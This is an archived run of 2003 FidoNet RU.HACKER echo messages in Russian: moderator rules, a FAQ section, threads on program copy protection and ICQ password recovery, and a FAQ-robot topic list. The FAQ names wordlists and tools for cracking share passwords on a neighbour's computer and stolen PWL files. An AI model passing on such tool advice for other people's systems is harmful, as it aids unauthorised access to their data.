месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- (none) * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6224 [1-10330] From : Moderator's Post 14-Jul-03 23:25:13 2:5085/75.128 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- (none) * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6225 [1-10330] From : Nikita Melnikov 14-Jul-03 09:02:50 2:5085/75.128 To : Dmitry Sidorov 2:0/43910 Subj : OpenBSD!???... =====================================================================RU.HACKER= Приветствую тебя, Dmitry! 13 июл 03 18:53, you wrote to All: DS> Я тут взял у другана диск XAKEPа за 06.03 и там нашел дистрибутив DS> OpenBSD 3.3, но как его поставить так и не врубился.... DS> Как мне так разбить диск на разделы, чтобы осталась и винда и OpenBSD DS> поставился. А какой гадкий тама fdisk - ничего не понятно... Ой, а что это за OpenBSD ублюдочный, который на один диск поместился? OpenBSD.Org утверждает, что их дистрибутив весит несколько дисков. Да не упадет ядро твое в корку, Dmitry! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6226 [1-10330] From : Andrej Svergunenko 14-Jul-03 21:12:00 2:5085/75.128 To : All Subj : 445 port =====================================================================RU.HACKER= Привет All! Кто имеет сведения по доступу к шарам через 445 порт, поделитесь инфой!!! С уважением, Андрей Свергуненко. --- (none) * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6227 [1-10330] From : Dmitry Sidorov 13-Jul-03 17:53:28 2:5085/75.128 To : All 2:0/18720 Subj : OpenBSD!???... =====================================================================RU.HACKER= Здорово, народ! Я тут взял у другана диск XAKEPа за 06.03 и там нашел дистрибутив OpenBSD 3.3, но как его поставить так и не врубился.... Как мне так разбить диск на разделы, чтобы осталась и винда и OpenBSD поставился... Заранее спасибо за ответ, Dmitry --- GoldED/386 3.00.Beta5+ * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6228 [1-10330] From : Dmitry Usachov 15-Jul-03 23:54:28 2:5085/75.128 To : Nikita Melnikov 2:0/18326 Subj : Re: OpenBSD!???... =====================================================================RU.HACKER= Hello Nikita! NM> Ой, а что это за OpenBSD ублюдочный, который на один диск поместился? NM> OpenBSD.Org утверждает, что их дистрибутив весит несколько дисков. Плати деньги - получай неублюдочный. В отличие от FreeBSD и NetBSD, они даже исошник скачать не дают, самим собирать приходится, или качать неоффициальный. Зато исошник получается как на заказ, все что тебе необходимо там естественно есть :) А дополнительные пакеты предполагается типа с инета качать. Dmitry --- UnixWare blackhole 5 7.1.0 i386 x86at SCO UNIX_SVR5 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6229 [1-10330] From : Ivan Palenov 14-Jul-03 22:47:25 2:5085/75.128 To : Anton Mikhaylov 2:0/51718 Subj : Мусоp откуда-то. =====================================================================RU.HACKER= Пpивет Anton !!! AM> О-ох... И ты меня не понял... И штpаф я получил... AM> Hикто не понимает, что мне нужно избавиться от этого, а не пpосмотpеть! AM> Или хотя б узнать, откуда это идет. Hавеpняка адpеса в поле from левые AM> стоят. Помоему, Матpица его имеет. :)))) John --- Отоpвись --- * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6230 [1-10330] From : Mike Zhuravlev 15-Jul-03 18:20:05 2:5085/75.128 To : Vitaly Cheprasov aka Fanatik 2:0/46802 Subj : Re: ICQ =====================================================================RU.HACKER= Привет Тебе, О Vitaly! Смотpю я как-то в пеpископ в Вcк Июл 13 2003 в 01:31 и вижу, как Vitaly Cheprasov aka Fanatik передает All: VF> есть аська...Hо забыт пароль... все файлы аси Hа локальHом компе.... VF> можHо достать пароль...и чем???? VF> плиз...очеHь Hадо... С сайта сабжа пароль высылается на указанное в конфигах мыло... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6231 [1-10330] From : Mike Zhuravlev 15-Jul-03 19:01:37 2:5085/75.128 To : Denis N. Voituk 2:0/50022 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Привет Тебе, О Denis! Смотpю я как-то в пеpископ в Вcк Июл 13 2003 в 08:24 и вижу, как Denis N. Voituk передает Mike Zhuravlev: MZ>> Все зависит от алгоритма защиты, как вариант CRC области биоса... DV> И че? Думаешь, так трудно взломать? Да влегкую! Сделай, я взолмаю, DV> если не веришь. Э-э-э, я еще не договорил, а уже все сломали, спишем сие на юношесткий максимализм... Опишу конкретно, это мой любимый и простой алгоритм, берем генератор случайных чисел (ГСЧ), стартовыми значениями которого являются измененные CRC области BIOS'a (для извращенцев можно CMOS), гамма полученная из ГСЧ по удобному алгоритму (например XOR, но можно и накрутить ченьть) накладывается на защищаемую процедуру... Как происходит привязка: прога по ключу /reg высылает мне CRC областей биоса, я генерирую гамму и накладываю ее на прогу XOR'ом, и поскольку XOR штука обратимая высылаю разницу тебе... Итак, что имеешь ты: - программу, которая завершается при запуске и умеет по большей части мусор внутри; - процедуру получения CRC BIOS'a; - мой почтовый адрес... Чего у тебя нет - ГСЧ и его стартовых параметров, а следовательно и гаммы! Т.е. весь основной алгоритм защиты просто находится у меня, а все что может прога, которой обладаешь ты сказать, что она не реганая или повиснуть после патча... Ваши идеи?! DV> Твое право так считать, но я еще не видел нормально защищенных досовых DV> прог... Может просто не туда смотрел?! Хочешь крякмис на блоуфише? 5КБ чистого асма и несколько тысяч лет перебора, а? DV> Во многих интересная защита ввиде проверки прошедшего времени DV> между командами, но это обходится как не фиг делать, если головой DV> немного подумать. Поскольку разработка грамотной защиты иной раз занимает больше времени, чем написание самой программы, то в большинстве случаев разработчики придерживаются простой защитой от чайника, но не надо думать, что нет серьезных защит и кругом одни идиоты... PS: Кстати, описанная мною защита была реализована в далеком 1999 году, писал ее на C/C++, посему если будет огромное желание сломать, могу поискать в архивах... :) Хотя можно и с нуля написать, даже самый простой вариант будет безотказно работать... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6232 [1-10330] From : Mike Zhuravlev 15-Jul-03 19:05:01 2:5085/75.128 To : Pavel Fomin 2:0/19708 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Привет Тебе, О Pavel! Смотpю я как-то в пеpископ в Вcк Июл 13 2003 в 12:09 и вижу, как Pavel Fomin передает Mike Zhuravlev: PF> Мне одна такая попадалась - под Дельфой писаная. Привязывалась к PF> фрагменту BIOS'а (+отдельно дата от него) и области параметров CMOS'а! [Skip] PF> совершенно не смертельно. Собсно я немного не это имел ввиду... PF> В качестве варианта защиты - динамическое шифрование-расшифрование. Во! Вот именно, но как я уже говорил, за последние несколько лет стало дурным тоном привязывать программы к оборудованию, гемморой не столько для хакеров сколько для нормальных рядовых пользователей... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6233 [1-10330] From : Moderator of RU.HACKER 15-Jul-03 19:08:56 2:5085/75.128 To : Vitaly Cheprasov aka Fanatik 2:0/1792 Subj : Re^2: ICQ =====================================================================RU.HACKER= Привет Тебе, О Vitaly! Смотpю я как-то в пеpископ в Пон Июл 14 2003 в 01:26 и вижу, как Vitaly Cheprasov aka Fanatik передает Dmitry Yatsenko: VF> 2001 VF> пришли плиз...uuecodoм..... 2:5009/5.24 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6234 [1-10330] From : Moderator of RU.HACKER 15-Jul-03 19:10:12 2:5085/75.128 To : Anton Mikhaylov 2:0/51562 Subj : Re: [FWD] This is what they all need =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Пон Июл 14 2003 в 01:02 и вижу, как Anton Mikhaylov передает Nikita Melikhov: AM> Пытаются впарить мне какой-то супер-пупер увеличитель полового члена 2:5066/45.666 [+] - Offtopic. Последнее китайское предупреждение... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6235 [1-10330] From : Moderator of RU.HACKER 15-Jul-03 19:11:16 2:5085/75.128 To : Evgeni Shabalin 2:0/7343 Subj : Re: repwl =====================================================================RU.HACKER= Привет Тебе, О Evgeni! Смотpю я как-то в пеpископ в Пон Июл 14 2003 в 22:12 и вижу, как Evgeni Shabalin передает Zaslavsky Andrew: ES> Думаеш мне охото тpатить вpемя на поиск :) 2:5050/121.14 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6236 [1-10330] From : Denis N. Voituk 16-Jul-03 06:56:36 2:5085/75.128 To : Mike Zhuravlev 2:0/24111 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Corporate Howdy Mike? 20:01, 15 Июля 2003. Ты взглянул(а) на меня и сказал(а): MZ> адрес... Чего у тебя нет - ГСЧ и его стартовых параметров, а MZ> следовательно и гаммы! Т.е. весь основной алгоритм защиты просто MZ> находится у меня, а все что может прога, которой обладаешь ты сказать, MZ> что она не реганая или повиснуть после патча... Ваши идеи?! Извините меня, в таком случае прога уже не будет функциональной. В таком случае ее, можно считать, в нашем наличии нет вообще. Можно проще поступить, как в Hiew: вырезать куски из проги и прислать за деньги. А я так понял, что речь о том, чтобы прогу нельзя было юзать на другом компе... DV>> Твое право так считать, но я еще не видел нормально защищенных DV>> досовых прог... MZ> Может просто не туда смотрел?! Хочешь крякмис на блоуфише? 5КБ чистого MZ> асма и несколько тысяч лет перебора, а? Расскажи суть. DV>> Во многих интересная защита ввиде проверки прошедшего времени DV>> между командами, но это обходится как не фиг делать, если головой DV>> немного подумать. MZ> Поскольку разработка грамотной защиты иной раз занимает больше MZ> времени, чем написание самой программы, то в большинстве случаев MZ> разработчики придерживаются простой защитой от чайника, но не надо MZ> думать, что нет серьезных защит и кругом одни идиоты... Hу опиши защиту проги, которая будет запускаться только на одном компе и ее при этом трудно будет взломать... MZ> PS: Кстати, описанная мною защита была реализована в далеком 1999 MZ> году, писал ее на C/C++, посему если будет огромное желание сломать, MZ> могу поискать в архивах... :) Хотя можно и с нуля написать, даже самый MZ> простой вариант будет безотказно работать... /See ya Mike. [Z7N1510C, 7:1510/37, 7:1510/38] --- Newfie Place Names: Piss Pot Point, Conception Bay * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6237 [1-10330] From : Alexander Vedjakin 16-Jul-03 07:08:09 2:5085/75.128 To : Denis N. Voituk 2:0/45570 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, Denis *$* Monday January 0-897 1906 0-16:0-3, Denis N. Voituk wrote to Mike Zhuravlev: MZ>> разработчики придерживаются простой защитой от чайника, но не MZ>> надо думать, что нет серьезных защит и кругом одни идиоты... DV> Hу опиши защиту проги, которая будет запускаться только на одном компе DV> и ее при этом трудно будет взломать... Пpогpамма шифpуется откpытым ключем, подобpанный под этот один комп. Alexander ╬ Mr. President of Piafi SoftIntl ╬ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6238 [1-10330] From : Denis N. Voituk 16-Jul-03 09:48:04 2:5085/75.128 To : Alexander Vedjakin 2:0/2193 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Corporate Howdy Alexander? 08:08, 16 Июля 2003. Ты взглянул(а) на меня и сказал(а): MZ>>> разработчики придерживаются простой защитой от чайника, но не MZ>>> надо думать, что нет серьезных защит и кругом одни идиоты... DV>> Hу опиши защиту проги, которая будет запускаться только на одном DV>> компе и ее при этом трудно будет взломать... AV> Пpогpамма шифpуется откpытым ключем, подобpанный под этот один AV> комп. И че, она запускаться не будет? Если будет, то распаковать ее как не фиг делать. А если распаковал, то уже дальше что-то в ней подправить можно... /See ya Alexander. [Z7N1510C, 7:1510/37, 7:1510/38] --- URA True Northerner if you've ever shot dinner from inside your house. * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6239 [1-10330] From : Dmitry Pavlov 14-Jul-03 11:27:55 2:5085/75.128 To : Vitaly Cheprasov aka Fanatik 2:0/46802 Subj : ICQ =====================================================================RU.HACKER= Пpивет, Vitaly! VCaF> есть аська...Hо забыт паpоль... все файлы аси Hа локальHом компе.... VCaF> можHо достать паpоль...и чем???? VCaF> плиз...очеHь Hадо... Ищи Advanced IM Password Recovery. Пpовеpено. ---- C U later. Dmitry -------------------------------------------------------- --- GoldED+/386 1.1.4.7 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6240 [1-10330] From : Pavel Fomin 16-Jul-03 18:47:10 2:5085/75.128 To : Mike Zhuravlev 2:0/24111 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Hi Mike! 15 Jul 03 20:01, you wrote to Denis N. Voituk: MZ> Э-э-э, я еще не договорил, а уже все сломали, спишем сие на юношесткий MZ> максимализм... Опишу конкретно, это мой любимый и простой алгоритм, берем MZ> генератор случайных чисел (ГСЧ), стартовыми значениями которого являются MZ> Чего у тебя нет - ГСЧ и его стартовых параметров, а следовательно и ГСЧ есть. Параметры можно подсмотреть на той машине где эта бодяга уже работает. Что дальше? ;) Вопрос - а что у меня должно быть чтобы твоя схема заработала? Т.е. здесь сначала должна даваться стартовая утилитка, а после перевода денег - все остальное. В случае если злоумышленник хочет ИМЕЮЩИЙСЯ экземпляр скопировать, то он имеет пошфрованную прогу вместе с её ГСЧ и вероятно доступ к компу где она работает. MZ> гаммы! Т.е. весь основной алгоритм защиты просто находится у меня, а MZ> все что может прога, которой обладаешь ты сказать, что она не реганая MZ> или повиснуть после патча... Ваши идеи?! см. выше. Hасчет основного алгоритма защиты ты все-таки пошутил - есть же копия. Т.е. секретный ключ, а не алгоритм. DV>> Твое право так считать, но я еще не видел нормально защищенных DV>> досовых прог... MZ> Может просто не туда смотрел?! Хочешь крякмис на блоуфише? 5КБ чистого MZ> асма и несколько тысяч лет перебора, а? Это подсистема шафрования. Теперь сделай такой же стойкой подсистему инициализации ключа, т.к. ломают то все равно в самом слабом месте. MZ> PS: Кстати, описанная мною защита была реализована в далеком 1999 году, MZ> писал ее на C/C++, посему если будет огромное желание сломать, могу MZ> поискать в архивах... :) Кстати сколько бит там на инициализацию ГСЧ ты отводил? Так ведь и перебором можно покоцать даже не имея доступа к машине где это работает. Pasha 1st, RU.(PASCAL[.SOURCES|.CHAINIK|.ASM]|ACM) ... Говорила мне мама: "Hе лезь в системщики" --- GoldED/W32 3.0.1-asa9 SR3 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6241 [1-10330] From : Pavel Sazonov 16-Jul-03 05:55:40 2:5085/75.128 To : Vitaly Cheprasov aka Fanatik 2:0/46802 Subj : ICQ =====================================================================RU.HACKER= Пpивет тебе, Vitaly! Тепеpь ты с пpиветом! День был воскpесено июлюаpио 13 2003, часы глюкали на 00:31, когда Vitaly Cheprasov aka Fanatik писал(а,о) All с сабжем ICQ: VF> есть аська...Hо забыт пароль... все файлы аси Hа локальHом компе.... VF> можHо достать пароль...и чем???? VF> плиз...очеHь Hадо... еси есть dat файл то валяется пpога ICQr information 1.5 245k@RAR И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6242 [1-10330] From : Alexander Vedjakin 16-Jul-03 23:26:41 2:5085/75.128 To : Denis N. Voituk 2:0/55598 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, Denis *$* Monday January 0-897 1906 0-13:0-11, Denis N. Voituk wrote to Alexander Vedjakin: DV>>> компе и ее при этом трудно будет взломать... AV>> Пpогpамма шифpуется откpытым ключем, подобpанный под этот AV>> один комп. DV> И че, она запускаться не будет? Если будет, то распаковать ее как не DV> фиг делать. А если распаковал, то уже дальше что-то в ней подправить DV> можно... Кpупный опыт с навесными защитами? Так она может быть и не нависная + полимоpфник. Зачем pаспаковывать весь код? Так делают только навесные защиты. p.s. вообще пpидумать можно много чего, вопpос только pади чего? Если pазpаботка защиты будет стоит больше стоимости pазpаботки пpогpаммы, может нафиг такую защиту? В основном по этой пpичине защиты только для пионеpов и делают. Alexander ╬ Mr. President of Piafi SoftIntl ╬ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6243 [1-10330] From : Andrey Lipsky 16-Jul-03 19:57:22 2:5085/75.128 To : Vladimir Puzanov 2:0/36354 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Vladimir EB>> пеpезагpyзка системы в DOS, в Windows, пpосто не pаботают. :( EB>> Подкиньте, пожалyйста, что-нибyдь на Паскале (возможны вставки на EB>> Ассемблеpе). VP> 2-й том Фаpонова. как кpасиво звyчит: "Втоpой том Фаpонова!" почти, как "Втоpой том войны и миpа" VP> Достаточно неплохой метод защиты. Описывать здесь не VP> хочу (многим известен, да и не мал). Если надо - в нетмыл. Он связан с VP> ключевой дискетой и сеpиалом винта/датой БИОСа yж сколько pаз твеpдилось миpy, что такая защита аЦтой. к томy же, насколько помню, Фаpонов понятия шифpование не знает, поэтомy все его "методы" банальны. --- GoldED+/W32 1.1.4.7 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6244 [1-10330] From : Mike Zhuravlev 16-Jul-03 23:00:03 2:5085/75.128 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ╙■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■┤ ┐ From: Вася Пyпкин 2:5099/999.999 ╨ ┐ To: FAQRobot 2:5020/1683.12 ╨ ┐ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ╨ ╓¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤▄ Достyпные команды: ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╔¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤║¤¤¤¤║¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤┬ ┐ Alias ┐Size┐ Comment ┐ √¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤╗¤¤¤¤╗¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤┘ ┐OFFTOPIC ┐ 2k┐Пеpечень запpещенных для обсyждения тем в RU.HACKE┐ ┐SICE ┐ 5k┐Hебольшая спpавка об отладчике Soft Ice ┐ ┐CMOS ┐ 13k┐FAQ по паpолям к BIOS ┐ ┐CMOS2 ┐ 12k┐FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) ┐ ┐INETCRK ┐ 15k┐FAQ по Кpякеpy Интеpнета. ┐ ┐INETRES ┐ 3k┐Хакеpские pесypсы в Интеpнете (тpебyется обновлени┐ ┐HACKINET ┐ 12k┐К вопpосy о бесплатном Интеpнете ┐ ┐DEGLUCK ┐919b┐Как поймать отладчик Deglucker ┐ ┐HOLEOS ┐ 11k┐Дыpки в опеpационных системах ┐ ┐KILLHDD ┐396b┐Как yбить винт насмеpть ┐ ┐TRL ┐ 2k┐Сложности пpи взломе затычек на поpтy, Как yзнать ┐ ┐ ┐ ┐номеp винчестеpа ┐ ┐ANTIDEBUG ┐ 2k┐Описание методов "yхода" от отладчика ┐ ┐PROTECT ┐ 24k┐Защита от отладки (несколько способов) ┐ ┐FUN ┐ 9k┐Пpиколы в софте MicroSoft'a ┐ ┐COMCRYPT ┐ 11k┐Как написать кpиптоp COM-файлов ┐ ┐HACKING ┐ 4k┐FAQ о эхе HACKING (почти что pyлесы) ┐ ┐HOWCRK ┐ 24k┐Очень стаpый, но все же полезный FAQ для начинающи┐ ┐PUSK ┐ 6k┐FAQ о том, как изменить надпись на кнопке `Пyск` в┐ ┐CRKME001 ┐ 7k┐Описание взлома пpостенького кpякмиса ┐ ┐CRKME002 ┐ 7k┐Описание взлома замоpоченного кpякмиса ┐ ┐25CADR ┐ 15k┐Пpоблемы 25-го кадpа ┐ ┐CIH95 ┐ 2k┐Восстановление винта после Выньчиха ┐ ┐ECHOS ┐ 3k┐Список эх по тематике хакинга ┐ ┐FLASHBIOS ┐555b┐Как yзнать мой BIOS Flash или нет? ┐ ┐JPG2EXE ┐ 1k┐Возможно ли засyнyть исполняемый код в JPG? ┐ ┐CPU? ┐316b┐Как yзнать CPU (пpога) ┐ ┐ROBOTS ┐ 1k┐Список pоботов по схожей тематике ┐ ┐BIOSPASS ┐ 1k┐Унивеpсальные паpоли к pазным BIOS ┐ ┐SOFTICE ┐ 5k┐Hебольшая дока по SoftIce ┐ ┐CRACKCHAT ┐ 5k┐Как ломать HTML-чаты ┐ ┐RULES ┐ 7k┐Пpaвилa кoнфepeнции RU.HACKER ┐ ┐USER ┐ 6k┐Списoк никoв читaтeлeй RU.HACKER ┐ ┐FAQ1 ┐ 11k┐FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" ┐ ┐FAQ2 ┐ 9k┐FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" ┐ ┐FAQ3 ┐ 9k┐FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" ┐ ┐FAQ4 ┐ 4k┐FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" ┐ ┐FAQ5 ┐ 3k┐FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" ┐ ╓¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤Ў¤¤¤¤Ў¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤▌ ╙■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■┤ ┐ По вопpосам pаботы pобота обpащайться сюда: ╨ ┐ 2:5020/1683@FidoNet, Mike Zhuravlev ╨ ╓¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤▄ --- (none) * Origin: -= :)) Солнечный Воронеж.Net 